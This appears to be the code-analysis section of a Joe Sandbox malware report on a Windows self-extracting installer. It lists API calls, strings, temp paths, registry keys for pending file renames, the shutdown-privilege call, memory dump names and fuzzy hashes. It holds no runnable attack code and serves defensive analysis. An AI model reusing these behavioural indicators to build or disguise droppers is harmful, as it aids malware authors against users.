                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                          • API String ID: 2209512893-559176071
                                                                                                                                                                                          • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                                                                                                                                          • Instruction ID: 417ba87a8b6e555f8ebd0f30e695bda9b3e819c7dd3450699a66a464a42bbf19
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78315A32A08F828BD724AF24E884AADF7A4FB88755FC44536EA8D43B54DF78D055CB14

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                          • String ID: IXP$IXP%03d.TMP
                                                                                                                                                                                          • API String ID: 1082909758-3932986939
                                                                                                                                                                                          • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                                                                                                                          • Instruction ID: e0c3c3be2e98f52269dbc284a5f2bd68594298823caa6982b9b3e172d1a7c6c6
                                                                                                                                                                                          • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A217F31608D4286E718AB22A9547BDE651EBCDB82FC58132DD0E477A4CF7C940AC614
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2995914023-0
                                                                                                                                                                                          • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                                                                                                                          • Instruction ID: 52636fdeeb264e7fb12aee6e03db7d3b51b7e70bf2356303bdef22f2af7cb8e7
                                                                                                                                                                                          • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51423190DE438AE768BB21E454B7DA295FBC4756FD40033DE5D86290DFBCE84AC628
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A65078
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: SizeofResource.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A65089
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A650AF
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: LoadResource.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A650C0
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: LockResource.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A650CF
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: memcpy_s.MSVCRT ref: 00007FF7D2A650EE
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: FreeResource.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A650FD
                                                                                                                                                                                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7D2A63123), ref: 00007FF7D2A660C9
                                                                                                                                                                                          • LocalFree.KERNEL32 ref: 00007FF7D2A66142
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A64DCC: LoadStringA.USER32 ref: 00007FF7D2A64E60
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A64DCC: MessageBoxA.USER32 ref: 00007FF7D2A64EA0
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A67700: GetLastError.KERNEL32 ref: 00007FF7D2A67704
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                          • String ID: $<None>$UPROMPT
                                                                                                                                                                                          • API String ID: 957408736-2569542085
                                                                                                                                                                                          • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                                                                                                                                          • Instruction ID: 5ff768e543b1930cc4d6f7528b747a0b511c9b125fd4ef6a86251598d3ccc3b7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 95316671E0CA4287F7286B20A550B7DFA51EBC9786FC44136DE0D47A91DFBDD406C618
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile$lstrcmp
                                                                                                                                                                                          • String ID: *MEMCAB
                                                                                                                                                                                          • API String ID: 1301100335-3211172518
                                                                                                                                                                                          • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                                                                                                                          • Instruction ID: a76b0e94dbd4ed31bd328221823bea3148cd65cfd76ce0abb192c65eedd55c65
                                                                                                                                                                                          • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8061C862908F4246F7689B159484B7DBB91E7C5B66FC45336CE6E026C0CFBCE007C624
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileTime$AttributesDateLocalTextWindow
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                          • API String ID: 1150793416-4293232008
                                                                                                                                                                                          • Opcode ID: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                                                                                                                                          • Instruction ID: ea0d029345f93baa8b1fca6b03fa677cc942085d190a5d5c332513d537e89133
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F51B322A1CE4281EB68AB11D4409BDA790FBC8B92FC44133DE4E43695CFBCE547C768
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2212493051-0
                                                                                                                                                                                          • Opcode ID: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                                                                                                                                          • Instruction ID: 90a28a6f4a9c48a5e5a5d22d8d2a89bf4d63e68a185f542928f54c74cc4e028c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E319432B14A028AE7149B65E8049BDBB60F789B5AFD45131CE0953B48CF7CE44ACB14
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocLocal
                                                                                                                                                                                          • String ID: TMP4351$.TMP
                                                                                                                                                                                          • API String ID: 3494564517-2619824408
                                                                                                                                                                                          • Opcode ID: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
                                                                                                                                                                                          • Instruction ID: c3a63eab704f44304d6016700705cb6a066c8185907dbbf1f931ae5901589372
                                                                                                                                                                                          • Opcode Fuzzy Hash: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF316171A08A4286E7186B21A41077EFA50EBC5BA6FC45335DE6A07BD5CFBCD406C718
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A63B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF7D2A63A09), ref: 00007FF7D2A63B64
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A63B40: PeekMessageA.USER32 ref: 00007FF7D2A63B89
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A63B40: PeekMessageA.USER32 ref: 00007FF7D2A63BCD
                                                                                                                                                                                          • WriteFile.KERNELBASE ref: 00007FF7D2A656E4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1084409-0
                                                                                                                                                                                          • Opcode ID: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                                                                                                                                          • Instruction ID: 0ed2b505799da6150a51f5b6c4c3201274e39f94c69bc494b0a9cc00f526bcf4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89218020A08D02C6E728AF15E844B39F761FBD4B96FD48236DE1D066A4CFBDD406CB58
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2018477427-0
                                                                                                                                                                                          • Opcode ID: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                                                                                                                                          • Instruction ID: 5e673e8d6188a4b82b2654d0dfa7814ace4a7b72d6c9722db9685a112c90c0fa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78118C3190CE4282F7586B20E584B7DE790EBD574AFD84232CD5C026E1CFBEA486C228
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharPrev
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 122130370-0
                                                                                                                                                                                          • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                                                                                                                          • Instruction ID: 10503584e94ac758e2e3164ea836be704c051a06cf57dea2484b2e6528d18dda
                                                                                                                                                                                          • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                                                                                                                          • Instruction Fuzzy Hash: 13010021A1CAC186F7056B11A84066DFA91E781BA1FD89232DF6A067C5CBACD883C718
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                          • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                                                                                                                          • Instruction ID: b888e0bd7655bb5e53cad9afbf7a5511903e2fcc1885fa0967bddce4fb37dd1d
                                                                                                                                                                                          • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: FCF06231608B82C6DB2C5F25F58057CB760EB89B59F844636DE2B466C4CFB8D482C724
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                                                                                                                          • String ID: $Adv$C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                          • API String ID: 3530494346-1736253296
                                                                                                                                                                                          • Opcode ID: 4787acaa4cb14b9ee032e1509576d07899f8c93a354d3e857d14b06fab914e10
                                                                                                                                                                                          • Instruction ID: 797ed4126d6fde09456f8c6966cab0cea7f5958a4d79e733c7f65051a6fa4df3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4787acaa4cb14b9ee032e1509576d07899f8c93a354d3e857d14b06fab914e10
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E717461A0CE42C6F768AB21A404B7DEA91FBC5F96FD44136CE4E02695CFBC9007C728
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                          • API String ID: 4204503880-1888249752
                                                                                                                                                                                          • Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                                                                                                                                          • Instruction ID: 3a6aca6b6fc3c238dae181d03bc29226ea0df135101308a4e4fd3a10876e18ff
                                                                                                                                                                                          • Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF312736608B458AE7149F16F4445AAFBA0FBC9B81F85513AEE8E43714DF7CE006CB14
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                                                          • API String ID: 2829607268-3733053543
                                                                                                                                                                                          • Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                                                                                                                          • Instruction ID: 08401c2ed1bb9c914955ec32f5eee521d3f6e242f93ecc3d1e4bfff5f509ab7d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD21A072A18A43C7E7549B20E044B7EFA61FBC9746FD09136DA4E02A54CF7CD00ACB18
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4104442557-0
                                                                                                                                                                                          • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                                                                                                                          • Instruction ID: 31deeddf69f0e06d6b4f7eeeb07e71404e7c4ef2a5a814d2cb3b994488559dd4
                                                                                                                                                                                          • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                                                                                                                          • Instruction Fuzzy Hash: 68118122708F428AEB04EF60E8486A873A4FB49759FC10A32EE6D47B54DFBCD165C354
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
